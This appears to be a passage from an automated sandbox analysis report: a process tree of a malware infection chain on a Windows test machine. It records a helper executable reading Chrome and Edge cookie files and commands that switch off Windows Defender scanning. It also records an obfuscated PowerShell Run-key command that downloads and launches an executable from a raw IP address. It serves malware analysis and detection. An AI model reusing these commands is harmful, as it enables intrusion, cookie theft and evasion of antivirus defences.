                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:4740
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9QV21.tmp\Setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9QV21.tmp\Setup.exe" /Verysilent
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4816
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4996
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          10⤵
                                                                                            PID:4976
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            10⤵
                                                                                              PID:5948
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              10⤵
                                                                                                PID:5632
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                10⤵
                                                                                                  PID:6312
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                9⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks whether UAC is enabled
                                                                                                • Drops file in Program Files directory
                                                                                                PID:6028
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                9⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:4656
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628100350 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                  10⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:4636
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                9⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1820
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-HV002.tmp\GameBoxWin32.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HV002.tmp\GameBoxWin32.tmp" /SL5="$302BE,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                  10⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5392
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LOHH5.tmp\Daldoula.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LOHH5.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                    11⤵
                                                                                                    • Drops file in Drivers directory
                                                                                                    • Adds Run key to start application
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:7280
                                                                                                    • C:\Program Files\Java\KQZOOUGSSO\ultramediaburner.exe
                                                                                                      "C:\Program Files\Java\KQZOOUGSSO\ultramediaburner.exe" /VERYSILENT
                                                                                                      12⤵
                                                                                                        PID:7580
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-PMRDA.tmp\ultramediaburner.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-PMRDA.tmp\ultramediaburner.tmp" /SL5="$2027A,281924,62464,C:\Program Files\Java\KQZOOUGSSO\ultramediaburner.exe" /VERYSILENT
                                                                                                          13⤵
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:7192
                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                            14⤵
                                                                                                              PID:7604
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\b7-178dc-b95-322b9-b0339087af09d\Jitepopaeky.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\b7-178dc-b95-322b9-b0339087af09d\Jitepopaeky.exe"
                                                                                                          12⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:7632
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a7-15aa1-315-dfcb3-49bdf654d8639\Daehemalaedo.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a7-15aa1-315-dfcb3-49bdf654d8639\Daehemalaedo.exe"
                                                                                                          12⤵
                                                                                                            PID:7700
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aum4ir04.uuy\GcleanerEU.exe /eufive & exit
                                                                                                              13⤵
                                                                                                                PID:8096
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5d0kbd3k.p0r\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                13⤵
                                                                                                                  PID:8140
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5d0kbd3k.p0r\installer.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5d0kbd3k.p0r\installer.exe /qn CAMPAIGN="654"
                                                                                                                    14⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:7684
                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5d0kbd3k.p0r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5d0kbd3k.p0r\ EXE_CMD_LINE="/forcecleanup /wintime 1628100350 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                      15⤵
                                                                                                                        PID:8000
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkcqxoym.b53\ufgaa.exe & exit
                                                                                                                    13⤵
                                                                                                                      PID:4664
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qkcqxoym.b53\ufgaa.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\qkcqxoym.b53\ufgaa.exe
                                                                                                                        14⤵
                                                                                                                          PID:5564
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            15⤵
                                                                                                                              PID:6856
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              15⤵
                                                                                                                                PID:5400
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                15⤵
                                                                                                                                  PID:7804
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  15⤵
                                                                                                                                    PID:7244
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fplnpfan.5n0\anyname.exe & exit
                                                                                                                                13⤵
                                                                                                                                  PID:8152
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fplnpfan.5n0\anyname.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fplnpfan.5n0\anyname.exe
                                                                                                                                    14⤵
                                                                                                                                      PID:5704
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fplnpfan.5n0\anyname.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\fplnpfan.5n0\anyname.exe" -q
                                                                                                                                        15⤵
                                                                                                                                          PID:5584
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qlze1hr0.awf\gcleaner.exe /mixfive & exit
                                                                                                                                      13⤵
                                                                                                                                        PID:5300
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:6016
                                                                                                                                • C:\Users\Admin\AppData\Roaming\5757479.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5757479.exe"
                                                                                                                                  10⤵
                                                                                                                                    PID:1788
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1186408.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1186408.exe"
                                                                                                                                    10⤵
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:4064
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                      11⤵
                                                                                                                                        PID:1232
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6734678.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6734678.exe"
                                                                                                                                      10⤵
                                                                                                                                        PID:5132
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          11⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5784
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8462351.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8462351.exe"
                                                                                                                                        10⤵
                                                                                                                                          PID:5752
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                        9⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5988
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                          10⤵
                                                                                                                                            PID:5000
                                                                                                                                  • C:\Users\Admin\Documents\OPkn3kpssiKLdgfRjLUocOx8.exe
                                                                                                                                    "C:\Users\Admin\Documents\OPkn3kpssiKLdgfRjLUocOx8.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4964
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 660
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3936
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 672
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:4052
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 780
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3492
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 816
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:1184
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 1124
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3936
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 1116
                                                                                                                                      7⤵
                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                      • Program crash
                                                                                                                                      PID:5156
                                                                                                                                  • C:\Users\Admin\Documents\TZWAUQdJURcIdj9GxGdTFLa4.exe
                                                                                                                                    "C:\Users\Admin\Documents\TZWAUQdJURcIdj9GxGdTFLa4.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:4292
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im TZWAUQdJURcIdj9GxGdTFLa4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\TZWAUQdJURcIdj9GxGdTFLa4.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      7⤵
                                                                                                                                        PID:648
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im TZWAUQdJURcIdj9GxGdTFLa4.exe /f
                                                                                                                                          8⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4068
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          8⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:5992
                                                                                                                                    • C:\Users\Admin\Documents\_Q88CaFCyGPYJtB0OWwsav8l.exe
                                                                                                                                      "C:\Users\Admin\Documents\_Q88CaFCyGPYJtB0OWwsav8l.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4900
                                                                                                                                      • C:\Users\Admin\Documents\_Q88CaFCyGPYJtB0OWwsav8l.exe
                                                                                                                                        "C:\Users\Admin\Documents\_Q88CaFCyGPYJtB0OWwsav8l.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:6268
                                                                                                                                    • C:\Users\Admin\Documents\I1uf_CHDK9cVqzz8R_Zrmp0Y.exe
                                                                                                                                      "C:\Users\Admin\Documents\I1uf_CHDK9cVqzz8R_Zrmp0Y.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2120
                                                                                                                                    • C:\Users\Admin\Documents\KgfDrUcwLBpf2X0WCZBL7Yal.exe
                                                                                                                                      "C:\Users\Admin\Documents\KgfDrUcwLBpf2X0WCZBL7Yal.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:200
                                                                                                                                      • C:\Users\Admin\Documents\KgfDrUcwLBpf2X0WCZBL7Yal.exe
                                                                                                                                        "C:\Users\Admin\Documents\KgfDrUcwLBpf2X0WCZBL7Yal.exe" -q
                                                                                                                                        7⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1864
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3084
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_4.exe
                                                                                                                                    sonia_4.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3064
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4060
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_3.exe
                                                                                                                                    sonia_3.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:3968
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 1436
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                      • Program crash
                                                                                                                                      PID:2160
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3548
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_6.exe
                                                                                                                                    sonia_6.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:3956
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3756
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5052
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                        PID:4192
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        6⤵
                                                                                                                                          PID:6412
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:3884
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 528
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1336
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:860
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:640
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4452
                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2244
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:1216
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:5332
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:5372
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2052
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 27ABB3DE2A9B0900C96300DCEA6C3F45 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:4756
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding AC5BCFCF74DF0B77330D212E8A9E50A2
                                                                                                                                    2⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2088
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                      3⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:4992
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding AEF2E4BA46F36FF9AE735D2939592359 E Global\MSI0000
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:6916
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 80990AAF6D5448CFD393CD7BB5F0058A C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:7880
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 9F54386FB3B91F624C6804E6709E993A
                                                                                                                                    2⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2012
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                      3⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:2280
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 710524AE191932411576A97FD62F28DB E Global\MSI0000
                                                                                                                                    2⤵
                                                                                                                                      PID:3152
                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:4548
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                      2⤵
                                                                                                                                        PID:4992
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                      1⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:6456
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C5BE.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C5BE.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:6252
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\CA53.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\CA53.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:6444
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D36C.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D36C.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:6388
                                                                                                                                            • C:\ProgramData\Runtimebroker.exe
                                                                                                                                              "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Drops startup file
                                                                                                                                              PID:6996
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                3⤵
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                PID:1004
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "powershell" Get-MpPreference -verbose
                                                                                                                                                3⤵
                                                                                                                                                  PID:7144
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3196
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                    3⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4996
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6860
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4972
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
